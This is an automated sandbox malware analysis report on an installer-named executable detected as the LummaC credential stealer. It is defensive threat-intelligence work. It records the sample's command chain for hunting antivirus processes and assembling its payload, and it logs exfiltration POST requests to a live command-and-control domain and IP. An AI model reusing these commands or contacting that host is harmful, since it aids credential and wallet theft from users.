Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1580747
MD5:91e7814911367eb7cbfa0e57f9beeaf8
SHA1:8c36ea6c6a191d819f20af8c12528fa0cb634295
SHA256:f49d0fd4dc1336729d23a5fdd9e30ec2c48b70adb526761cc5a7954def28a4f1
Tags:exeuser-aachum
Infos:

Detection

LummaC Stealer
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • Set-up.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 91E7814911367EB7CBFA0E57F9BEEAF8)
    • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7644 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7652 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7728 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7736 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7772 cmdline: cmd /c md 8429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7788 cmdline: extrac32 /Y /E Magnificent MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7812 cmdline: findstr /V "Subsidiary" Sharing MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7828 cmdline: cmd /c copy /b ..\Facilitate + ..\Girlfriend + ..\Id + ..\Paid + ..\Sensor + ..\Channel + ..\Scroll k MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Functions.com (PID: 7844 cmdline: Functions.com k MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7860 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Sigma Signatures

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Sigma detected: Search for Antivirus process
      Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7736, ProcessName: findstr.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-25T22:44:54.031217+010020283713Unknown Traffic192.168.2.449738172.67.158.190443TCP
      2024-12-25T22:44:55.986825+010020283713Unknown Traffic192.168.2.449739172.67.158.190443TCP
      2024-12-25T22:44:58.268166+010020283713Unknown Traffic192.168.2.449740172.67.158.190443TCP
      2024-12-25T22:45:00.607499+010020283713Unknown Traffic192.168.2.449741172.67.158.190443TCP
      2024-12-25T22:45:02.692006+010020283713Unknown Traffic192.168.2.449742172.67.158.190443TCP
      2024-12-25T22:45:05.173993+010020283713Unknown Traffic192.168.2.449744172.67.158.190443TCP
      2024-12-25T22:45:07.174641+010020283713Unknown Traffic192.168.2.449751172.67.158.190443TCP
      2024-12-25T22:45:09.433794+010020283713Unknown Traffic192.168.2.449757172.67.158.190443TCP
      2024-12-25T22:45:12.472873+010020283713Unknown Traffic192.168.2.449763172.67.158.190443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-25T22:44:54.761975+010020546531A Network Trojan was detected192.168.2.449738172.67.158.190443TCP
      2024-12-25T22:44:56.793498+010020546531A Network Trojan was detected192.168.2.449739172.67.158.190443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-25T22:44:54.761975+010020498361A Network Trojan was detected192.168.2.449738172.67.158.190443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-25T22:44:56.793498+010020498121A Network Trojan was detected192.168.2.449739172.67.158.190443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-25T22:44:59.182411+010020480941Malware Command and Control Activity Detected192.168.2.449740172.67.158.190443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\8429Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\8429\Jump to behavior

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49738 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49739 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 172.67.158.190:443
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49757 -> 172.67.158.190:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 172.67.158.190:443
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CDE2PQC5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18102Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U7I3OYSRQVLGNEJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8765Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GKG54EEMA5BVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MG4J6KCQKGA918BMTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7129Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PZIDIZOGNX37OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: locketsashayz.click
      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VPWH7DRWQ2W1MIENUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 592729Host: locketsashayz.click
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: AmbFabOJkVOtJKbeUCnvdoZI.AmbFabOJkVOtJKbeUCnvdoZI
      Source: global trafficDNS traffic detected: DNS query: locketsashayz.click
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Set-up.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Set-up.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: Set-up.exeString found in binary or memory: http://crl.globalsign.com/root.crl0G
      Source: Set-up.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Set-up.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
      Source: Set-up.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
      Source: Set-up.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
      Source: Set-up.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Set-up.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Set-up.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
      Source: Set-up.exe, Functions.com.1.dr, Became.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Set-up.exeString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
      Source: Functions.com, 0000000B.00000000.1738896115.0000000000185000.00000002.00000001.01000000.00000007.sdmp, Functions.com.1.dr, Contributor.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: Functions.com.1.dr, Became.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Became.8.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.158.190:443 -> 192.168.2.4:49757 version: TLS 1.2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\MayUpperJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\SaddamPursuantJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\ArrangementPrestonJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Windows\EscortBrokersJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040737E0_2_0040737E
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00406EFE0_2_00406EFE
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004079A20_2_004079A2
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004049A80_2_004049A8
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\8429\Functions.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 004062CF appears 58 times
      Source: Set-up.exeStatic PE information: invalid certificate
      Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@24/21@2/1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
      Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
      Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\nsx745.tmpJump to behavior
      Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 8429
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Magnificent
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Subsidiary" Sharing
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Facilitate + ..\Girlfriend + ..\Id + ..\Paid + ..\Sensor + ..\Channel + ..\Scroll k
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\8429\Functions.com Functions.com k
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Tool Tool.cmd & Tool.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 8429Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E MagnificentJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Subsidiary" Sharing Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Facilitate + ..\Girlfriend + ..\Id + ..\Paid + ..\Sensor + ..\Channel + ..\Scroll kJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\8429\Functions.com Functions.com kJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.staterepositoryps.dllJump to behavior
